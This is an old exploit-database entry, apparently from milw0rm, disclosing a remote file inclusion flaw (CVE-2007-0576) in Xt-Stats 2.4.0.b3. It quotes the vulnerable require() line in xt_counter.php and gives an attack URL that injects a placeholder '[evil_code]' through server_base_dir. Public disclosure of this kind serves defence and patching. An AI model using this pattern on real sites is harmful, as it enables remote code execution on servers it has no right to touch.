Xt-Stats 2.4.0.b3 (server_base_dir) - Remote File Inclusion
Author: ThE dE@Th
type: webapps
platform: php
port:
date_added: 2007-01-26
date_updated:
verified: 1
codes: OSVDB-32980;CVE-2007-0576
tags:
aliases:
screenshot_url:
application_url:
Download:http://www.xt-scripts.com/index.php?dl=32
**************************************************
Finded by ThE dE@Th
*******************
Greetz For :AsB-May Team & HaCk.eGy
***********************************
xt_counter.php:
*************
require( $server_base_dir.'management/sources/counter_class.php');
http://www.site.com/[path]/xt_counter.php?server_base_dir=[evil_code]
*************************************************************
# milw0rm.com [2007-01-27]